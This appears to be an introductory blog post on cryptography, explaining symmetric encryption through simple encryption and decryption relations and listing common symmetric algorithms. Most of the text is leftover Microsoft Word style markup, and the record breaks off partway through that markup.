<span style="font-family: Times, 'Times New Roman', serif;">Cryptography consists from two main categories (some people might claim more categories but for the papooses of this paper two categories cover the needs of this paper). The fist category is symmetric cryptography and the second category is asymmetric cryptography.</span><br />
<div class="New">
<br />
<span style="font-family: Times, Times New Roman, serif; font-size: large;"><b> Symmetric Cryptography</b></span></div>
<div class="New">
<span style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<div class="New">
<span style="font-family: Times, Times New Roman, serif;">Symmetric Cryptography uses cryptographic algorithms that use identical cryptographic keys for both decryption and encryption (this is not entirely true, but again for the purposes of this paper we accept it as a fact).The Symmetric Cryptography keys, in practice, represent a shared secret between two or more parties that can be used to maintain a private information link. [5] The following simple mathematical relationships can describe the relation between decryption and encryption in Symmetric Cryptography.</span><br />
<br />
<span style="color: red;">Encryption ( k , Plaintext ) = Cipher (1) </span><br />
<br />
<span style="color: red;">Decryption ( k , Cipher ) = Plaintext (2) </span></div>
<div class="New">
<br /></div>
<div class="New">
Where k a secret shared value and Plaintext the data input we want to convert into cipher. From relationships (1) and (2) we can conclude that: </div>
<div class="New">
<br />
<span style="color: red;">Plaintext = Decryption ( k , Cipher ) = Decryption ( k , Encryption ( k , Plaintext )) (3) </span><br />
<span style="color: red;"><br /></span></div>
<div class="New">
<b>Note</b>: Among the most popular and well-respected symmetric algorithms ARE Twofish, Serpent, AES (Rijndael), Blowfish, CAST5, RC4, TDES, and IDEA.</div>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<div class="MsoNormal">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDwmSbSvzQsN6dI0dwzJ4Y9g8Hop8aOgQ0bb7Ltz_jm_twpAYyEucsxqc5JVe8W8k30nyOSKufuaNMqMhuzrW0TaZdl5b_eERX7JTDh7DIGC33Qi8vvacUpngBEaFsUwTvF25ACyfCyVc/s1600/c2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Times, Times New Roman, serif;"><img border="0" height="151" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDwmSbSvzQsN6dI0dwzJ4Y9g8Hop8aOgQ0bb7Ltz_jm_twpAYyEucsxqc5JVe8W8k30nyOSKufuaNMqMhuzrW0TaZdl5b_eERX7JTDh7DIGC33Qi8vvacUpngBEaFsUwTvF25ACyfCyVc/s1600/c2.png" width="400" /></span></a></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
<!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Revision>0</o:Revision>
<o:TotalTime>0</o:TotalTime>
<o:Pages>1</o:Pages>
<o:Words>5</o:Words>
<o:Characters>33</o:Characters>
<o:Company>Lamehacker</o:Company>
<o:Lines>1</o:Lines>
<o:Paragraphs>1</o:Paragraphs>
<o:CharactersWithSpaces>37</o:CharactersWithSpaces>
<o:Version>14.0</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
<o:PixelsPerInch>96</o:PixelsPerInch>
<o:TargetScreenSize>800x600</o:TargetScreenSize>
</o:OfficeDocumentSettings>
</xml><![endif]-->
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>JA</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="276">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="0" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]-->
<!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin:0cm;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman";}
</style>
<![endif]-->
<!--StartFragment-->
</span><br />
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><b>Picture3</b>: Symmetric
cryptography [7]<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">
<!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Revision>0</o:Revision>
<o:TotalTime>0</o:TotalTime>
<o:Pages>1</o:Pages>
<o:Words>216</o:Words>
<o:Characters>1236</o:Characters>
<o:Company>Lamehacker</o:Company>
<o:Lines>10</o:Lines>
<o:Paragraphs>2</o:Paragraphs>
<o:CharactersWithSpaces>1450</o:CharactersWithSpaces>
<o:Version>14.0</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
<o:PixelsPerInch>96</o:PixelsPerInch>
<o:TargetScreenSize>800x600</o:TargetScreenSize>
</o:OfficeDocumentSettings>
</xml><![endif]-->
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>JA</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="276">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="0" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
